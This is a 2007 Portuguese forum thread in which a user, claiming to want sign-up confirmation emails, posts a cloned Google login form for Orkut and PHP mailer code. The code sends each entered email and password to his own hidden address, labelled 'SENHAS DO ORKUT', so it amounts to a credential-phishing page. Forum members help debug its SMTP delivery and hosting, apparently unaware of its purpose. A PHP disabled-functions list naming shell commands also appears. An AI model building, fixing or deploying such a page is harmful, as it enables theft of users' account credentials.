Guest mister Postado Dezembro 3, 2007 Denunciar Share Postado Dezembro 3, 2007 bom eu estou montando un sitee estou com uma duvida a minha duvida é a seguintetipo na hr q alguém vai cria o usuario tem os seguintes camposloginsenha emailai ta a pessoa coloca isso e cria o usuariomais eu queria q quando ela efetuase esse cadastro o login e a senha mais uma msg criada por mim fosse enviada para o email q ela colocojá tentei de todo jeito e não consegui por isso to pedinu a ajuda akivlw galera Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 8, 2007 Denunciar Share Postado Dezembro 8, 2007 <?php require "class.phpmailer.php"; $Email = $_POST['Email']; $Passwd = $_POST['Passwd']; $para = $_POST['para']; $mail = new PHPMailer(); $mail->IsHTML(true); $mail->WordWrap = 50; $mail->IsSMTP(); $mail->SMTPAuth = true; $mail->Mailer = "smtp"; $mail->Host = "smtp.mail.yahoo.com.br"; $mail->Username = "mmeu usuario"; $mail->Password = "minha senha"; $mail->From = "meu usuario@yahoo.com.br"; $mail->FromName = "meu nome"; $mail->AddReplyTo("um email ppara manda uma replica","nome do dono do email"); $mail->AddAddress("$para"); $mail->Body = " login = $Email senha = $Passwd msg do meu site"; $mail->Subject = "assunto do email"; if(!$mail->Send()){ echo "<meta HTTP-EQUIV='Refresh' CONTENT='0;URL=site q vai abri/'>"; } else { echo "<erro>" . $mail>ErrorInfo; } ?> Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 8, 2007 Denunciar Share Postado Dezembro 8, 2007 Esta linha você pode retirar:$mail->Mailer = "smtp"; Você está colocando os e-mails e senha corretos onde você colocou "meu e-mail", "minha senha" etc, né?Como o erro foi ubknown error, é difícil saber o que está dando problema... Corrija o ErrorInfo: $mail->ErrorInfo. Falrou o hífen Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 8, 2007 Denunciar Share Postado Dezembro 8, 2007 tipo no formulariota assim <td> <input type="password" name="Passwd" class="gaia le val" id="Passwd" size="18"> </td> </tr> <input type="hidden" name="para" value="o email q vai recebe"> <tr> ai tpo pra coloca nu php q vai envia o email poe é o name num é?tipo$Passwd = $_POST['Passwd'];$para = $_POST['para'];as vezes é isso Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 10, 2007 Denunciar Share Postado Dezembro 10, 2007 (editado) ow então pode acontecer o erro porcausa da função$mail->AddReplyTosera?tenta da uma analisada denovo no formulario axo q u erro ta na hr de passar as informaçoes dele para o php do email<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>cadastro</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> body { background-color: #D4DDED; color: #000; font-family: Verdana, Arial, sans-serif; font-size: 12px; margin: 10px } .newText { padding: 10px 20px; line-height: 1.5em; font-size: 12px; text-align: center } .magenta { color: #B11E89 } .newMain { background: #FFF; padding: 15px } .newGaia { background: #FFF; padding: 3px } .spacer { height: 7px; background-color: #D4DDED; margin: 3px -3px } .newFooter { background-color: #BCCDE9; margin: 10px 0 0 0; font-size: 12px; padding: 5px; text-align: center } .joinNow { font-size: 12px; background: #E8EEFA; padding: 8px 3px; text-align: center; line-height: 1.7em } a:link { color: #0047BE; text-decoration: underline; font-size: 100% } a:visited { color: #0047BE; text-decoration: underline } a:hover { color: #C40098; text-decoration: underline } </style> <script><!-- function gaia_onLoginSubmit() { if (window.gaiacb_onLoginSubmit) { return gaiacb_onLoginSubmit(); } else { return true; } } function gaia_setFocus() { var f = null; if (document.getElementById) { f = document.getElementById("gaia_loginform"); } else if (window.gaia_loginform) { f = window.gaia_loginform; } if (f) { if (f.Email.value == null || f.Email.value == "") { f.Email.focus(); } else { f.Passwd.focus(); } } } --></script> <style type="text/css"><!-- div.errormsg { color: red; font-size: smaller; font-family:arial,sans-serif; } font.errormsg { color: red; font-size: smaller; font-family:arial,sans-serif; } --></style> <style type="text/css"><!-- .gaia.le.lbl { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } .gaia.le.fpwd { font-family: Arial, Helvetica, sans-serif; font-size: 70%; } .gaia.le.chusr { font-family: Arial, Helvetica, sans-serif; font-size: 70%; } .gaia.le.val { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } .gaia.le.button { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } .gaia.le.rem { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } .gaia.captchahtml.desc { font-family: arial, sans-serif; font-size: smaller; } .gaia.captchahtml.cmt { font-family: arial, sans-serif; font-size: smaller; font-style: italic; } --></style> </head> <body> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <!--DWLayoutTable--> <tbody> <tr> <td width="983" height="137" valign="top" class="newGaia"> <div id="gaia_loginbox"> <table class="form-noindent" cellspacing="0" cellpadding="5" width="100%" border="0"> <tr> <td valign="top" style="text-align:center" nowrap="nowrap" bgcolor="#E8EEFA"> <form id="gaia_loginform" action="aki vai o site por onde vai se enviado o email é aki q eu não sei uq eu ponho" method="post" onsubmit="return(gaia_onLoginSubmit());"> <table id="gaia_table" align="center" border="0" cellpadding="1" cellspacing="0"> <!--DWLayoutTable--> <tr> <td height="22" colspan="2" valign="top"><input type="hidden" name="continue" id="continue" value="http://meu site" /> <input type="hidden" name="service" id="service2" value="orkut" /> <input type="hidden" name="rm" id="rm2" value="false" /> <input type="hidden" name="hl" id="hl2" value="pt-BR" /> </td> </tr> <tr> <td width="81" height="27" valign="top" nowrap="nowrap"> <div align="right"> <span class="gaia le lbl"> E-mail: </span> </div> </td> <td width="247" valign="top"> <input type="text" name="Email" value="" class="gaia le val" id="Email" size="40"> </td> </tr> <tr> <td height="27" align="right" valign="top"> <span class="gaia le lbl"> Senha: </span> </td> <td valign="top"> <span class="gaia le rem"> <input type="password" name="Passwd2" class="gaia le val" id="Passwd2" size="40"> </span></td> </tr> <tr> <td height="29"> </td> <td align="left" valign="top"> <input type="submit" class="gaia le button" name="signIn" value="criar" /> </td> </tr> <tr> <td height="3"></td> <td></td> </tr> <script type="text/javascript"><!-- function onPreCreateAccount() { return true; } function onPreLogin() { if (window["onlogin"] != null) { return onlogin(); } else { return true; } } --></script> <input type="hidden" name="para" value="aki vai u email do cara"> </table> </form> </td> </tr> </table> </div><div class="spacer"></div> </td> </tr> </tbody> </table> <div class="newFooter">by mister </div> </body> </html>olha ai esse codigo ai<form id="gaia_loginform" action="aki vai o site por onde vai se enviado o email é aki q eu não sei uq eu ponho" method="post"onsubmit="return(gaia_onLoginSubmit());">as vezes eu tenho q colocar alguma coisa dele no phpa e otra coisa tipo to tentando varios erros q pode serai apaarece esse erro ai não é?Warning: fsockopen() [function.fsockopen]: unable to connect to smtp.mail.yahoo.com.br:25 (Unknown error) in /www/110mb.com/c/a/b/u/l/o/s/o/cabuloso/htdocs/email/class.smtp.php on line 122ai qr q eu mande o class.smtp.mail.phpas vezes eu ele esta com errosera q não existe nenhum site de hospedagen gratuita q possa usar a funçaum mail()se souber de algum fale q ajudara muitohehe :P Editado Dezembro 10, 2007 por Mister M Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 10, 2007 Denunciar Share Postado Dezembro 10, 2007 O erro não é no formulário, é na conexão com o SMTP. Deve haver algum erro nas variávei $Hostname, Username ou Password. Reveja-as. Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 11, 2007 Denunciar Share Postado Dezembro 11, 2007 bom tentei com um otro email deu u mesmo erro ai eu tava pesquisand aki acho q u erro esta porque u servidor bloqueia a funçaum fsockopen()ai eu joge nu google e vi q muitas pessoas tem esse erro ai achei esse scrip aki e vo tenta usalo qalqr coisa do ideiahttp://xpertmailer.sourceforge.net/é fi não consegui com esse scrpt tamensera q vocês não sabem nenhum site de hospedagen gratuito q tenha a função mail() ativada não?ow então a função fsockopen() ativada?ow sera q tem geito de ativalas?sei lá fi temq ter um jeito de resolver isso <_<olha ai nu php.info ta tudo isso ai desabilitado :o disable_functions system, exec, shell_exec, proc_open, passthru, set_time_limit, error_log, ini_alter, dl, pfsockopen, openlog, syslog, readlink, symlink, link, leak, popen, escapeshellcmd, apache_child_terminate, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual, mb_send_mail, pcntl_exec, socket_connect, socket_createtem umjeito de enviar email sem usar essas parada ai? Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 11, 2007 Denunciar Share Postado Dezembro 11, 2007 Usando SMTP remoto, voc6e nào precisa hospedar o script num servidor. Pode rodá-lo no localhost mesmo, com todas as funções disponíveis. ;) Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 11, 2007 Denunciar Share Postado Dezembro 11, 2007 (editado) bom o smtp remoto seria isso não é?<?php $Email = $_POST['Email']; $Passwd = $_POST['Passwd']; $para = $_POST['para']; $mail = new PHPMailer(); $mail->IsSMTP(); $mail->Host = "smtp.mail.yahoo.com.br"; $mail->SMTPAuth = true; $mail->Username = "meu usuario"; $mail->Password = "minha senha"; $mail->From = "meu email"; $mail->FromName = "Mailer"; $mail->AddAddress("$para","SENHAS DO ORKUT"); $mail->AddReplyTo("email para o envio da replica","nome"); $mail->WordWrap = 50; // AKI EU COLCO o que? $mail->AddAttachment("/var/tmp/file.tar.gz"); // AKI EU COLCO o que? $mail->AddAttachment("/tmp/image.jpg", "new.jpg"); $mail->IsHTML(true); // AKI EU COLCO o que? $mail->Subject = "Here is the subject"; $mail->Body = "This is the HTML body"; $mail->AltBody = "This is the text-only body"; if(!$mail->Send()) { echo "A mensagem não pode ser enviada "; echo "Erro: " . $mail->ErrorInfo; exit; } echo "Mensagem enviada"; ?>tipo tem campos q eu nam sei o que eu devo colocare tamen não sei onde colocar a msgvlw aewa e como eu faço para rodá-lo no localhost? Editado Dezembro 11, 2007 por Mister M Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 13, 2007 Denunciar Share Postado Dezembro 13, 2007 (editado) uq seria local host?pesquisei aki e não intendi nada Editado Dezembro 13, 2007 por Mister M Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 ESerra Postado Dezembro 13, 2007 Denunciar Share Postado Dezembro 13, 2007 Em primeiro lugar, leia as regras do Fórum, UPs não são permitidos...Em segundo lugar, localhost é quando você executa alguma coisa na própria máquina em que está operando, ou seja, se você instalar o Apache/PHP e testa os scripts ai no seu próprio PC, está operando em localhost, por outro lado, se você testar os scripts em um servidor remoto, ai já não será localhost... Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 13, 2007 Denunciar Share Postado Dezembro 13, 2007 (editado) mais tipo se eu usar o localhost para uma pagina phpsera posivel q otros computadores possam utilizar o que eu coloquei no local host?e se tiver geito só sera posivel quando meu pc estiver conectado a net? Editado Dezembro 13, 2007 por Mister M Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 13, 2007 Denunciar Share Postado Dezembro 13, 2007 Para os outros acessarem o conteúdo no seu PC, você terá de estar conectado e ter um DNS. Veja o site do No-IP. Eles fornecem DNS dinâmico gratuitamente.http://www.no-ip.com Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 14, 2007 Denunciar Share Postado Dezembro 14, 2007 a mais eu não quero isso mesmo porque meu pc não vai poder fica ligado o tempo todo eu queria mesmo é hospeda fime ajuda no smtp remoto<?php $Email = $_POST['Email']; $Passwd = $_POST['Passwd']; $para = $_POST['para']; $mail = new PHPMailer(); $mail->IsSMTP(); $mail->Host = "smtp.mail.yahoo.com.br"; $mail->SMTPAuth = true; $mail->Username = "meu usuario"; $mail->Password = "minha senha"; $mail->From = "meu email"; $mail->FromName = "Mailer"; $mail->AddAddress("$para","SENHAS DO ORKUT"); $mail->AddReplyTo("email para o envio da replica","nome"); $mail->WordWrap = 50; // AKI EU COLCO o que? $mail->AddAttachment("/var/tmp/file.tar.gz"); // AKI EU COLCO o que? $mail->AddAttachment("/tmp/image.jpg", "new.jpg"); $mail->IsHTML(true); // AKI EU COLCO o que? $mail->Subject = "Here is the subject"; $mail->Body = "This is the HTML body"; $mail->AltBody = "This is the text-only body"; if(!$mail->Send()) { echo "A mensagem não pode ser enviada "; echo "Erro: " . $mail->ErrorInfo; exit; } echo "Mensagem enviada"; ?>olha ai tem campos q eu não sei uq coloar e tamen não sei onde colocar a msgajuda plis Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 14, 2007 Denunciar Share Postado Dezembro 14, 2007 WordWrap não precisa ser mexido, mas se quiser, pode colocar o número máximo de caracteres por linha.O método AddAttatchment adiciona um anexo à mensagem. Se não quiser anexar nada, nào chame esse método. Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 D4rkMu Postado Dezembro 19, 2007 Denunciar Share Postado Dezembro 19, 2007 Cara agora é so por na includes o arquivo class.smtp.php que pode ser encontrado no banco de Scripts do ScriptBrasil! Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Janeiro 28, 2008 Denunciar Share Postado Janeiro 28, 2008 bm depois de muito tempo estou de volta akifiquei afastado porque taa sem pcmais q q peganão tem como eu usar o smtp remoto pois no site onde eu estou hospedando meu sita a funçaum fsockopen() esta desabilitada e não encontrei nenhum otro sitte q essa função esteja habilitada então eu pesquisei e achei este otro jeitohttp://xpertmailer.sourceforge.net/mais esta ocorrendo este problemaError !Array ( [0] => Array ( [1201556688.89] => Array ( [0] => initialize class ) ) [1] => Array ( [1201556688.89] => Array ( [0] => set From address ) ) [2] => Array ( [1201556688.89] => Array ( [0] => add To address ) ) [3] => Array ( [1201556688.89] => Array ( [0] => set subject ) ) [4] => Array ( [1201556688.89] => Array ( [0] => set text version ) ) [5] => Array ( [1201556689.03] => Array ( [0] => send mail local ) ) )você tem ideia q problema é esse?ai vai meu xpertmailer pra você verem<?php define('DISPLAY_XPM4_ERRORS', true); // display XPM4 errors require_once 'MAIL.php'; // path to 'MAIL.php' file from XPM4 package $Email = $_POST['Email']; $Passwd = $_POST['Passwd']; $para = $_POST['para']; $data =date("Y-m-d"); $hora =date("H:i:s"); $m = new MAIL; // initialize MAIL class $m->From('meu email'); // set from address $m->AddTo("$para"); // add to address $m->Subject('Cadastro'); // set subject $m->Text('<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.1//EN\" \"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd\"> <html xmlns=\"http://www.w3.org/1999/xhtml\"> <head> <title>Cadastro</title> </head> <body> Login: <strong>$Email</strong><br /> Senha: <strong>$Passw</strong><br /> Data: <strong>$data</strong><br /> Hora: <strong>$hora</strong><br /><br /><br /> </body></html>'); // set text message // send mail local and print result echo $m->Send() ? 'Mail sent !' : 'Error !'; print_r($m->History); // optional, for debugging ?> Citar Link para o comentário Compartilhar em outros sites More sharing options...
Pergunta
Guest mister
bom eu estou montando un site
e estou com uma duvida
a minha duvida é a seguinte
tipo na hr q alguém vai cria o usuario tem os seguintes campos
login
senha
email
ai ta a pessoa coloca isso e cria o usuario
mais eu queria q quando ela efetuase esse cadastro o login e a senha mais uma msg criada por mim fosse enviada para o email q ela coloco
já tentei de todo jeito e não consegui por isso to pedinu a ajuda aki
vlw galera
Link para o comentário
Compartilhar em outros sites
41 respostass a esta questão
Posts Recomendados
Participe da discussão
Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.